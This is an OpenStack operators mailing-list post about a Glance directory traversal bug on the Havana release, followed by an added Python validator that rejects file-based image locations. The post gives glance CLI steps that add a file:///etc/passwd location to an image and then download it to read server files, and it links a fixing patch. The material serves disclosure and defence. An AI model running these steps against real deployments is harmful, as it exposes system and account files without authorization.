[Openstack-operators] glance directory traversal bug and havana

Jesse Keating jlk at bluebox.net
Thu Jan 8 17:37:15 UTC 2015


On 1/7/15 8:47 PM, George Shuklin wrote:
> I spent a few hours trying to backport to Havana, but then I found that
> Havana seems to be immune to the bug. I'm not 100% sure, so someone else
> is advised to look too.
>
> The bug was that icehouse+ accepts all supported schemas. Fix excludes
> 'bad' schemes. Although Havana has an explicitly given list of accepted
> schemes for the location field, and 'bad' schemes are not in it.
>

Havana is certainly not immune. I was able to fetch content from the 
system fairly easily.

Start with an updated glance client

Modify it as listed in 
https://bugs.launchpad.net/glance/+bug/1400966/comments/6

$ glance image-create --disk-format raw --container-format bare

$ glance image-update --size 700 <image_id>

$ glance --os-image-api-version 2 location-add --url file:///etc/passwd

$ glance image-download <image_id>


That got me (some of) the contents of /etc/passwd.

The patch I posted prevented this from happening. It blocks adding a 
location that is file:// based, but still allows other location adds 
that should be allowed.

https://github.com/blueboxgroup/glance/commit/7ab98b72802de1d5695d35306e32293463977496

-- 
-jlk
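
An added example (not the patch linked above and not Glance's own code) of the kind of check the message describes: refuse file-based image locations submitted through the API while still accepting remote ones. The function name and both scheme sets are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Constructed for this example: schemes the image service can read from.
KNOWN_SCHEMES = {"file", "filesystem", "http", "https", "swift", "rbd"}
# Assumption: schemes that resolve to the API server's own disk, so a
# client-supplied location must never use them.
SERVER_LOCAL_SCHEMES = {"file", "filesystem"}


def validate_external_location(url, known=KNOWN_SCHEMES,
                               server_local=SERVER_LOCAL_SCHEMES):
    """Return (accepted, reason) for a location URL supplied by an API client."""
    if not isinstance(url, str) or not url.strip():
        return False, "empty location"
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        # urlsplit raises on malformed input such as an unclosed IPv6 literal
        return False, "unparseable location"
    scheme = parts.scheme.lower()
    if not scheme:
        # A bare path such as /etc/passwd carries no scheme at all
        return False, "missing scheme"
    if scheme in server_local:
        return False, "scheme is server-local"
    if scheme not in known:
        return False, "unknown scheme"
    if not parts.netloc:
        # A remote location with no host would be left to the store driver to interpret
        return False, "missing host"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs
    for candidate in ("file:///etc/passwd", "FILE:///etc/passwd",
                      "/etc/passwd", "gopher://host/x",
                      "http://images.example.com/cirros.img"):
        print(candidate, validate_external_location(candidate))
```

The check compares the parsed, lower-cased scheme rather than a string prefix, so case variants of the same URL are handled identically.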


